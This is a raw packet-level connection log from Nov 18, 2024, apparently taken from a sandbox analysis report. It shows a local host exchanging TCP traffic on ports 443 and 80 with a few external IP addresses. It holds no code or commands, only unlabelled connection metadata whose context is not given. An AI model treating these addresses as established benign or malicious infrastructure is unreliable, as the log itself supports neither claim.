                                                                                                                                                  Nov 18, 2024 18:22:00.246469975 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.246474028 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.246506929 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.247270107 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.247327089 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.247337103 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.247354031 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.247397900 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.247406960 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.247415066 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.247462034 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.247579098 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.248485088 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.248537064 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.248548031 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.248560905 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.248584986 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.248593092 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.248631001 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.248636007 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.248646021 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.248794079 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.249372005 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.249429941 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.249439955 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.250286102 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.250334978 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.250338078 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.250351906 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.250395060 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.250403881 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.250415087 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.251115084 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.251163960 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.251173973 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.251185894 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.251214981 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.251223087 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.251240969 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.251247883 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.251291037 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.251296043 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.251758099 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252029896 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252079964 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252088070 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252098083 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252136946 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252144098 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252157927 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252206087 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252516031 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252566099 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252572060 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252582073 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252612114 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252619982 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252643108 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252688885 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.252696037 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252710104 CET44349166142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:00.252744913 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.253073931 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.253114939 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:00.261986017 CET49166443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:04.520049095 CET8049171107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:04.520262957 CET4917180192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:07.462039948 CET4917180192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:07.462061882 CET49168443192.168.2.225.45.108.48
                                                                                                                                                  Nov 18, 2024 18:22:16.093796968 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.098916054 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.098979950 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.099082947 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.104510069 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.277590990 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:16.277626991 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.277688026 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:16.278934002 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:16.278949976 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.764638901 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.764700890 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.764750957 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.764936924 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.764986038 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.764997959 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.765022993 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.765120029 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.765131950 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.765165091 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.766000986 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.766012907 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.766025066 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.766050100 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.769748926 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.769793987 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.769813061 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.881634951 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.881691933 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.881747007 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.882086039 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.882124901 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.882159948 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.882174015 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.882186890 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.882205963 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.882256031 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.882292986 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.882985115 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.883039951 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.883052111 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.883084059 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.883128881 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.883141041 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.883172989 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.883397102 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.883549929 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.883598089 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.998905897 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.998933077 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.998944998 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.998982906 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.999073982 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.999135971 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.999145985 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.999172926 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:16.999959946 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:16.999995947 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.000003099 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.000009060 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.000044107 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.000159025 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.000179052 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.000190973 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.000222921 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.045924902 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.045944929 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.045958042 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.045970917 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.046003103 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.046035051 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.116000891 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.116020918 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.116041899 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.116055012 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.116069078 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.116070986 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.116122007 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.116975069 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.116985083 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.117022991 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.117068052 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.117079973 CET8049172107.172.44.178192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.117117882 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.200397015 CET4917280192.168.2.22107.172.44.178
                                                                                                                                                  Nov 18, 2024 18:22:17.352852106 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.352916956 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.359272003 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.359283924 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.359568119 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.412595987 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.455329895 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.724504948 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.724544048 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.724598885 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.724625111 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.845597029 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.845612049 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.845669985 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.845683098 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.888360023 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.888375998 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.888408899 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.888427019 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.888439894 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.888478041 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.888478041 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.997646093 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.997658014 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.997720003 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:17.997730017 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:17.997795105 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.052275896 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.052294970 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.052335024 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.052365065 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.052421093 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.052421093 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.182651997 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.182663918 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.182729959 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.182758093 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.237292051 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.237302065 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.237376928 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.237406969 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.293215990 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.293226957 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.293294907 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.293307066 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.293370008 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.294632912 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.329319954 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.329329014 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.329389095 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.329401970 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.329459906 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.413949966 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.413969040 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.414016008 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.414017916 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.414068937 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.414082050 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.452912092 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.452929020 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.452991962 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.453005075 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.496999025 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.497024059 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.497071028 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.497087955 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.572287083 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.572305918 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.572345972 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.572364092 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.572382927 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.573057890 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.617393017 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.617404938 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.617425919 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.617455006 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.617471933 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.617593050 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.653944016 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.653954983 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.654010057 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.654033899 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.654090881 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.655497074 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.717809916 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.717823029 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.717854977 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.717875004 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.717907906 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.775125027 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.775136948 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.775192976 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.775274038 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.775274038 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.839030981 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.839042902 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.839097977 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.839124918 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.857014894 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.857074022 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.857089043 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.857136011 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.860375881 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.933028936 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.933044910 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.933115005 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.933144093 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.959661961 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.959712029 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.959749937 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:18.959779024 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:18.959816933 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.016087055 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.016102076 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.016165018 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.016176939 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.068243027 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.068295002 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.068319082 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.068335056 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.070240974 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.098095894 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.098104954 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.098146915 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.098153114 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.098191977 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.183159113 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.183173895 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.183233976 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.183269024 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.200074911 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.200083971 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.200136900 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.200164080 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.200212002 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.218261003 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.218269110 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.218322039 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.218333006 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.292534113 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.292584896 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.292658091 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.292679071 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.292727947 CET49173443192.168.2.22142.215.209.78
                                                                                                                                                  Nov 18, 2024 18:22:19.321384907 CET44349173142.215.209.78192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:19.321402073 CET44349173142.215.209.78192.168.2.22
